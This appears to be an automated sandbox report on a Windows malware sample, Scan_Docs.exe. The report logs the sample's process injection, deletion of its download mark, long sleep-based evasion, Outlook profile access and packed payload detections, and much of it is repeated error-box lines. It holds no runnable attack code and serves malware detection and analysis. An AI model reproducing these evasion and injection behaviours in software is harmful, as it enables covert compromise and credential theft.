                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe'Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdb source: Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp
                Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdbg6 source: Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp

                Data Obfuscation:

                Yara detected aPLib compressed binary
                Source: Yara match | File source: 00000005.00000003.638435641.0000000006005000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000003.638046125.0000000006055000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.643749879.000000000410A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.643793917.0000000004124000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Scan_Docs.exe PID: 4192, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Scan_Docs.exe PID: 4764, type: MEMORY
                Source: Yara match | File source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CD805D push es; ret 5_2_00CD81DA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CD2860 push es; ret 5_2_00CD2C6A
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CF41C9 pushfd ; iretd 5_2_00CF41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CF4139 pushfd ; iretd 5_2_00CF41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CF9AD2 push ebx; iretd 5_2_00CF9ADF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00D0F29F push eax; ret 5_2_00D0F2AF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CF2797 push esi; ret 5_2_00CF2845
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02ECC9C9 push E86A5725h; retf 5_2_02ECCA01
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_00402AC0 push eax; ret 6_2_00402AD4
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_00402AC0 push eax; ret 6_2_00402AFC
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007C2860 push es; ret 6_2_007C2C6A
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007C805D push es; ret 6_2_007C81DA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007E4139 pushfd ; iretd 6_2_007E41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007E41C9 pushfd ; iretd 6_2_007E41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007E9AD2 push ebx; iretd 6_2_007E9ADF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007FF29F push eax; ret 6_2_007FF2AF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007E2797 push esi; ret 6_2_007E2845

                Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | File opened: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe:Zone.Identifier read attributes | delete
                Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Process information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Source: C:\Windows\SysWOW64\unarchiver.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 2432 Thread sleep count: 61 > 30
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 2432 Thread sleep time: -30500s >= -30000s
                Source: C:\Windows\SysWOW64\unarchiver.exe TID: 3148 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 3688 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 4708 Thread sleep count: 191 > 30
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 4524 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe TID: 3220 Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW
                Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 0_2_0168B042 GetSystemInfo
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Process information queried: ProcessInformation

                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Code function: 6_2_00402B7C GetProcessHeap,RtlAllocateHeap
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\unarchiver.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Memory written: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar'
                Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe'
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Process created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmp Binary or memory string: Progman
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                Source: Scan_Docs.exe, 00000006.00000002.958867069.00000000012D0000.00000002.00000001.sdmp Binary or memory string: =Program Managerb

                Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation